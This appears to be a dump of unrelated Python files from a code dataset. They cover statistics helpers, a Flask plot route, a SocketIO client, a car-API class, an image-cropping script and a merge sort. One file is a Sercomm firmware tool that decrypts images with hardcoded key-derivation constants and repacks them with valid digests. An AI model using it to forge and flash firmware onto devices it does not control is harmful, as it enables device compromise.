download_url=DOWNLOAD_URL,
author=PROJECT_AUTHOR,
author_email="",
packages=PACKAGES,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
python_requires=">=3.7",
install_requires=["requests>=2.14.0"],
classifiers=[
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
62075
|
import numpy as np
from scipy.stats import binom
# import modules needed for logging
import logging
import os
logger = logging.getLogger(__name__) # module logger
def cummin(x):
"""A python implementation of the cummin function in R"""
for i in range(1, len(x)):
if x[i-1] < x[i]:
x[i] = x[i-1]
return x
def bh_fdr(pval):
"""A python implementation of the Benjamani-Hochberg FDR method.
This code should always give precisely the same answer as using
p.adjust(pval, method="BH") in R.
Parameters
----------
pval : list or array
list/array of p-values
Returns
-------
pval_adj : np.array
adjusted p-values according the benjamani-hochberg method
"""
pval_array = np.array(pval)
sorted_order = np.argsort(pval_array)
original_order = np.argsort(sorted_order)
pval_array = pval_array[sorted_order]
# calculate the needed alpha
n = float(len(pval))
pval_adj = np.zeros(int(n))
i = np.arange(1, n+1, dtype=float)[::-1] # largest to smallest
pval_adj = np.minimum(1, cummin(n/i * pval_array[::-1]))[::-1]
return pval_adj[original_order]
def frequency_test(mut_of_interest,
total_mut,
residues_of_interest,
residues_at_risk):
"""Perform a binomial test on the frequency of missense mutations within
given pre-defined residues within the gene.
Parameters
----------
mut_of_interest : {list, np.array}
number of mutations that are deemed "of interest"
total_mut : {list, np.array}
total number of mutations
residues_of_interest : {list, np.array}
contains the number of residues of interest for a mutation.
residues_at_risk : {list, np.array}
contains the number of residues at risk for a mutation.
Returns
-------
p_values : np.array
p-value for each gene for binomial test
"""
# initialize input
p_values = np.zeros(len(mut_of_interest))
mut = np.asarray(mut_of_interest)
N = np.asarray(total_mut)
residues_of_interest = np.asarray(residues_of_interest)
residues_at_risk = np.asarray(residues_at_risk, dtype=float)
residues_at_risk[residues_at_risk==0] = np.nan # fill zeros to avoid divide by zero
# calculate the background probability of mutation occurring at
# the residues of interest
P = residues_of_interest.astype(float) / residues_at_risk
# iterate through each gene to calculate p-value
logger.info('Calculating binomial test p-values . . .')
for k in range(len(mut)):
if not np.isnan(P[k]):
p_val = binomial_test(mut[k], N[k], P[k])
else:
# catch case for nan element
p_val = 1.0
p_values[k] = p_val
logger.info('Finished calculating binomial test p-values.')
return p_values
def binomial_test(n, N, P):
"""Perform binomial test on the observed n being higher than expected.
Specifically, N residues are at risk and of those there are n mutations
occurred at the Np residues of interest. Given the background probability of
a mutation at a specific residue, the p-value is calculated as the probability
of observing n or greater mutations. Since N is large and n is small,
it is computationally more efficient to take 1 - Pr(i<=n-1).
Parameters
----------
n : int
number of observed mutations
N : int
number of residues at risk
P : float
background probability that a mutation would occur at a single residue
Returns
-------
pval : np.array
p-value for binomial test
"""
if n <= 0:
return 1.0
pval = binom.sf(n-1, N, P)
return pval
|
62081
|
import io
from flask import (
Blueprint,
render_template,
abort,
current_app,
make_response
)
import numpy as np
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
client = Blueprint('client', __name__, template_folder='templates', static_url_path='/static')
@client.route('/<int:points>', methods=['GET'])
def home(points):
title = current_app.config['TITLE']
plot = plot_points(points)
return render_template('index.html', title=title, plot=plot)
def plot_points(points):
"""Generate a plot with a varying number of randomly generated points
Args:
points (int): a number of points to plot
Returns: An svg plot with <points> data points
"""
# data for plotting
data = np.random
data = np.random.rand(points, 2)
fig = Figure()
FigureCanvas(fig)
ax = fig.add_subplot(111)
ax.scatter(data[:,0], data[:,1])
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_title(f'There are {points} data points!')
ax.grid(True)
img = io.StringIO()
fig.savefig(img, format='svg')
#clip off the xml headers from the image
svg_img = '<svg' + img.getvalue().split('<svg')[1]
return svg_img
|
62104
|
from utils import *
from block_descriptor import *
from Crypto.Cipher import AES
import hashlib
import cStringIO
import gzip
import json
import gzip_mod
import os
class Image:
def __init__(self, image_data, read=True):
self.stream = cStringIO.StringIO(image_data)
self.stream_len = len(image_data)
if read:
self.readHeader()
def getBody(self):
cur_pos = self.stream.tell()
self.stream.seek(0xA0)
body = self.stream.read()
self.stream.seek(cur_pos)
return body
def readHeader(self):
# Header size appears to universally be 0xA0 (160) bytes, with 32 bytes alloted per field.
raise Exception('readHeader not implemented for class %s!' % self.__class__.__name__)
def validateType(self):
raise Exception('No validateType implemented for class %s!' % self.__class__.__name__)
def getKeyPair(self):
raise Exception('No getKeyPair implemented for class %s' % self.__class__.__name__)
def decryptImage(self):
# Firmware images for Sercomm devices appear to universally use AES 256 in CBC mode.
if not hasattr(self, 'filesize'):
raise Exception('decryptImage called before readHeader!')
key_pair = self.getKeyPair()
aes = AES.new(key=key_pair['key'], mode=AES.MODE_CBC, IV=key_pair['iv'])
cur_pos = self.stream.tell()
# Seek past the header (remember, always 160 bytes!)
self.stream.seek(0xA0)
plaintext_body = aes.decrypt(self.stream.read())
return plaintext_body[:self.filesize]
class Stage2(Image):
def readHeader(self):
self.device_header = self.stream.read(128)
self.image_digest = self.stream.read(32)
self.blocks = []
def validateType(self):
if not hasattr(self, 'device_header'):
raise Exception('validateType called before readHeader!')
digest = hashlib.new('sha256')
digest.update(self.getBody())
return digest.digest() == self.image_digest
def extractHeader(self):
if not hasattr(self, 'device_header'):
raise Exception('extractHeader called before readHeader!')
try:
open('dev_hdr.bin', 'wb').write(self.device_header)
except IOError:
print('[-] Failed to write device header to file!')
def extractBlocks(self):
cur_pos = self.stream.tell()
self.stream.seek(0xA0)
gzip_stream = gzip.GzipFile(fileobj=self.stream, mode='rb')
while True:
block_name = unnullpad_str(gzip_stream.read(32))
if not block_name:
break
payload_size = int(unnullpad_str(gzip_stream.read(32)))
block_version = unnullpad_str(gzip_stream.read(32))
gzip_stream.read(32) # Padding?
try:
file_name = '%s_%s.bin' % (block_name, block_version)
open(file_name, 'wb').write(gzip_stream.read(payload_size))
self.blocks.append(BlockDescriptor(block_name, block_version, file_name))
print('[+] Wrote block %s version %s to file!' % (block_name, block_version))
except IOError:
print('[-] Failed to write block %s to file!' % block_name)
self.stream.seek(cur_pos)
def readManifest(self):
self.blocks = []
manifest_data = json.loads(open('manifest.json', 'rb').read())
if 'blocks' not in manifest_data:
raise Exception('Invalid firmware manifest provided!')
for block in manifest_data['blocks']:
self.blocks.append(BlockDescriptor(block['block_name'], block['block_version'], block['block_filename']))
def writeManifest(self):
block_manifests = []
for block in self.blocks:
block_manifests.append(block.asDict())
manifest_data = dict(blocks=block_manifests)
try:
open('manifest.json', 'wb').write(json.dumps(manifest_data))
except IOError:
print('[-] Failed to write manifest to file!')
def createImage(self):
self.stream = cStringIO.StringIO()
content_stream = cStringIO.StringIO()
gzip_wrapper = gzip_mod.GzipFile(filename = None, mode = 'wb', fileobj = content_stream, compresslevel = 6)
for block in self.blocks:
print('[+] Writing block with name %s and version %s to stream...' % (block.block_name, block.block_version))
gzip_wrapper.write(nullpad_str(block.block_name, 32))
gzip_wrapper.write(nullpad_str(str(os.path.getsize(block.block_filename)), 32))
gzip_wrapper.write(nullpad_str(block.block_version, 32))
gzip_wrapper.write('\x00' * 32) # Padding
gzip_wrapper.write(open(block.block_filename, 'rb').read())
gzip_wrapper.close()
content_stream.seek(0)
body_digest = hashlib.new('sha256')
body_digest.update(content_stream.read())
content_stream.seek(0)
self.stream.write(open('dev_hdr.bin', 'rb').read())
self.stream.write(body_digest.digest())
self.stream.write(content_stream.read())
self.stream.seek(0)
self.readHeader()
assert self.validateType() # Make sure we can pass our own validation checks
self.stream.seek(0)
return self.stream.read()
class Type1(Image):
def readHeader(self):
self.nullpad = self.stream.read(32)
self.fw_version = unnullpad_str(self.stream.read(32))
self.iv = self.stream.read(32)
self.nullpad2 = self.stream.read(32)
self.filesize = int(unnullpad_str(self.stream.read(32)))
assert self.stream.tell() == 0xA0
def validateType(self):
return self.nullpad == ('\x00' * 32) and self.nullpad2 == ('\x00' * 32)
def getKeyPair(self):
if not hasattr(self, 'fw_version'):
raise Exception('validateType called before readHeader!')
digest_1 = hashlib.new('md5')
digest_1.update(self.nullpad2)
digest_1.update(nullpad_str(self.fw_version, 32))
digest_2 = hashlib.new('md5')
digest_2.update(nullpad_str(str(self.filesize), 32))
digest_2.update(nullpad_str(self.fw_version, 32))
key = digest_1.digest() + digest_2.digest()
return dict(key=key, iv=self.iv[:16])
def createImage(self, fw_version, stage2_image):
self.stream = cStringIO.StringIO()
self.nullpad = '\x00' * 32
self.nullpad2 = '\x00' * 32
self.fw_version = fw_version
self.filesize = len(stage2_image)
self.iv = os.urandom(32)
image_key = self.getKeyPair()
aes = AES.new(key=image_key['key'], mode=AES.MODE_CBC, IV=image_key['iv'][:16]) # NB: Only the first 16 bytes are used
self.stream.write(self.nullpad) # Padding
self.stream.write(nullpad_str(self.fw_version, 32))
self.stream.write(self.iv)
self.stream.write(self.nullpad2) # More padding
self.stream.write(nullpad_str(str(self.filesize), 32))
self.stream.write(aes.encrypt(pkcs7_pad(stage2_image)))
self.stream.seek(0)
self.readHeader()
assert self.validateType()
self.stream.seek(0)
return self.stream.read()
class Type2(Image):
def readHeader(self):
self.image_digest = self.stream.read(32)
self.fw_version = unnullpad_str(self.stream.read(32))
self.key_factor = self.stream.read(32)
self.iv = self.stream.read(32)
self.filesize = int(unnullpad_str(self.stream.read(32)))
assert self.stream.tell() == 0xA0
def validateType(self):
if not hasattr(self, 'fw_version'):
raise Exception('validateType called before readHeader!')
cur_pos = self.stream.tell()
self.stream.seek(32) # Skip original image digest
digest = hashlib.new('sha256')
digest.update(('\x00' * 32) + self.stream.read())
self.stream.seek(cur_pos)
return digest.digest() == self.image_digest
@staticmethod
def keyPermutator(key):
perm_tbl = '26aejsw37bfktx48chmuy59dipvz'
key = bytearray(key)
for i in xrange(len(key)):
key[i] = perm_tbl[key[i] % len(perm_tbl)]
return str(key)
def getKeyPair(self):
digest_1 = hashlib.new('md5')
digest_1.update(self.key_factor)
digest_1.update(self.fw_version)
digest_2 = hashlib.new('md5')
digest_2.update('b7293e8150d1330c6c3d93f2fa81331b')
digest_2.update(self.fw_version)
digest_3 = hashlib.new('md5')
digest_3.update('83f323b7132703029da5f4a9daa72a60')
digest_3.update(self.fw_version)
digest_fin = hashlib.new('md5')
digest_fin.update(digest_1.digest())
digest_fin.update(digest_2.digest())
digest_fin.update(digest_3.digest())
key = Type2.keyPermutator(sercomm_hexdigest(digest_fin.digest()))
return dict(key=key, iv=self.iv[:16])
def createImage(self, fw_version, stage2_image):
self.stream = cStringIO.StringIO()
self.fw_version = fw_version
self.filesize = len(stage2_image)
self.key_factor = os.urandom(32)
#self.iv = os.urandom(32)
self.iv = '\x00' * 32
image_key = self.getKeyPair()
aes = AES.new(key=image_key['key'], mode=AES.MODE_CBC, IV=image_key['iv'][:16]) # NB: Only the first 16 bytes are used
self.stream.write('\x00' * 32) # Null digest for initial digest calculation
self.stream.write(nullpad_str(self.fw_version, 32))
self.stream.write(self.key_factor)
self.stream.write(self.iv)
self.stream.write(nullpad_str(str(self.filesize), 32))
self.stream.write(aes.encrypt(pkcs7_pad(stage2_image)))
self.stream.seek(0)
digest = hashlib.new('sha256')
digest.update(self.stream.read()) # Now overwrite it with the actual image digest
self.stream.seek(0)
self.stream.write(digest.digest())
self.stream.seek(0)
self.readHeader()
assert self.validateType()
self.stream.seek(0)
return self.stream.read()
|
62106
|
from .genoabc import AlleleContainer
from .alleles import Alleles
from .sparsealleles import SparseAlleles
from .chromosometemplate import ChromosomeTemplate, ChromosomeSet
from .labelledalleles import LabelledAlleles, InheritanceSpan, AncestralAllele
|
62147
|
from .exception import AuthFailedException
from .client import default_client
def init(client=default_client):
"""
Init configuration for SocketIO client.
Returns:
Event client that will be able to set listeners.
"""
from socketIO_client import SocketIO, BaseNamespace
from . import get_event_host
from gazu.client import make_auth_header
path = get_event_host(client)
event_client = SocketIO(path, None, headers=make_auth_header())
main_namespace = event_client.define(BaseNamespace, "/events")
event_client.main_namespace = main_namespace
event_client.on('error', connect_error)
return event_client
def connect_error(data):
print("The connection failed!")
return data
def add_listener(event_client, event_name, event_handler):
"""
Set a listener that reacts to a given event.
"""
event_client.main_namespace.on(event_name, event_handler)
return event_client
def run_client(event_client):
"""
Run event client (it blocks current thread). It listens to all events
configured.
"""
try:
event_client.wait()
except TypeError:
raise AuthFailedException
return event_client
|
62174
|
from datetime import datetime
import logging
from weconnect.addressable import AddressableAttribute, AddressableList
from weconnect.elements.generic_settings import GenericSettings
from weconnect.util import robustTimeParse
LOG = logging.getLogger("weconnect")
class ChargingProfiles(GenericSettings):
def __init__(
self,
vehicle,
parent,
statusId,
fromDict=None,
fixAPI=True,
):
self.profiles = AddressableList(localAddress='profiles', parent=self)
self.timeInCar = AddressableAttribute(localAddress='timeInCar', parent=self, value=None, valueType=datetime)
super().__init__(vehicle=vehicle, parent=parent, statusId=statusId, fromDict=fromDict, fixAPI=fixAPI)
def update(self, fromDict, ignoreAttributes=None):
ignoreAttributes = ignoreAttributes or []
LOG.debug('Update charging profiles from dict')
if 'value' in fromDict:
if 'profiles' in fromDict['value'] and fromDict['value']['profiles'] is not None:
for profile in fromDict['value']['profiles']:
LOG.warning('Charging profiles are not yet implemented %s', profile)
else:
self.profiles.clear()
self.profiles.enabled = False
if 'timeInCar' in fromDict['value']:
self.timeInCar.setValueWithCarTime(robustTimeParse(
fromDict['value']['timeInCar']), lastUpdateFromCar=None, fromServer=True)
else:
self.timeInCar.enabled = False
else:
self.profiles.clear()
self.profiles.enabled = False
self.timeInCar.enabled = False
super().update(fromDict=fromDict, ignoreAttributes=(ignoreAttributes + ['profiles', 'timeInCar']))
def __str__(self):
string = super().__str__()
if self.timeInCar.enabled:
string += f'\n\tTime in Car: {self.timeInCar.value.isoformat()}' # pylint: disable=no-member
string += f' (captured at {self.carCapturedTimestamp.value.isoformat()})' # pylint: disable=no-member
string += f'\n\tProfiles: {len(self.profiles)} items'
for profile in self.profiles:
string += f'\n\t\t{profile}'
return string
|
62213
|
import cv2 as cv
import numpy as np
from PIL import Image
import os
import time
import os
import concurrent.futures
#used for resizing, it will resize the image maintaining aspect ratio
# to the smallest dimension, my images were 5000 by 1000, so it gets shrunk to
# 40 px tall and an unknown width.
size = (1920, 40)
# only run on files with this file extension.
ext = '.jpeg'
# folder to run on.
path = os.getcwd()
startTime = 0
def get_boundaries(name, debug=False):
# crop out unecessary whitespace
src = cv.imread(cv.samples.findFile(name),1)
src_gray = cv.blur(src, (3,3))
threshold = 100
leftmost = src.shape[1]
rightmost = 0
canny_output = cv.Canny(src_gray, threshold, threshold * 2)
contours, _ = cv.findContours(canny_output, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
offset = int(src.shape[1]*0.03)
# Get the mass centers
mc = [None]*len(contours)
for i in range(len(contours)):
# Get the moment
moment = cv.moments(contours[i])
# add 1e-5 to avoid division by zero
mc[i] = (moment['m10'] / (moment['m00'] + 1e-5), moment['m01'] / (moment['m00'] + 1e-5))
# Draw contours
#minarea = 1000
for i, j in enumerate(contours):
val = int(mc[i][0])
area = cv.contourArea(contours[i])
#val = int(i[0][0][0])
if leftmost > val and val > offset:# and area > minarea:
leftmost = val
if rightmost < val and val < src.shape[1]-offset:# and area > minarea:
rightmost = val
if debug >= 2:
print('val: ',end='')
print(val, end = '')
print(' '.join(['Number', str(i), 'lm', str(leftmost),
'rm', str(rightmost)]))
leftmost -= offset
rightmost += offset
# Calculate the area with the moments 00 and compare with the result of the OpenCV function
if debug >= 3:
for i in range(len(contours)):
print(' * Contour[{0}]. Area: {1}. Length: {2}.'.format(i, cv.contourArea(contours[i]), cv.arcLength(contours[i], True), contours[i]))
return leftmost, 0, rightmost, src.shape[0]
def run_on(path, debug=False):
global startTime
startTime = int(time.time())
op = []
count = 0
namelist = []
for root, dirs, files in os.walk(path):
for name in files:
if ext in name:
namelist.append(name)
with concurrent.futures.ThreadPoolExecutor() as executor:
for name, result in zip(namelist, executor.map(get_boundaries, namelist)):
if debug >= 1: print('Time Elapsed:',
str(int(time.time())-startTime),
'secs. Image:', count, 'Name:', name)
shrink_and_crop(name, result, size, debug)
count+=1
print('Done in {} seconds!'.format(str(int(time.time())-startTime)))
def shrink_and_crop(name, cropbox, maxsize, debug=False):
im = Image.open(name)
if debug >= 2: print(im, cropbox)
try:
im = im.crop(cropbox)
if im.size[1] > maxsize[1]:
im.thumbnail(maxsize)
if debug >= 2: print(im)
im.save(name)
#im.save('did it work1.jpg')
except ValueError:
print('Did not run on:',name)
run_on(path, debug=1)
|
62219
|
class Solution:
def sortArray(self, nums: List[int]) -> List[int]:
temp = [0] * len(nums)
def mergeSort(start, end):
if start < end:
mid = (start + end) // 2
mergeSort(start, mid)
mergeSort(mid + 1, end)
i = k = start
j = mid + 1
while i <= mid:
while j <= end and nums[j] < nums[i]:
temp[k] = nums[j]
j += 1
k += 1
temp[k] = nums[i]
i += 1
k += 1
while j <= end:
temp[k] = nums[j]
j += 1
k += 1
nums[start: end + 1] = temp[start: end + 1]
mergeSort(0, len(nums) - 1)
return nums
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.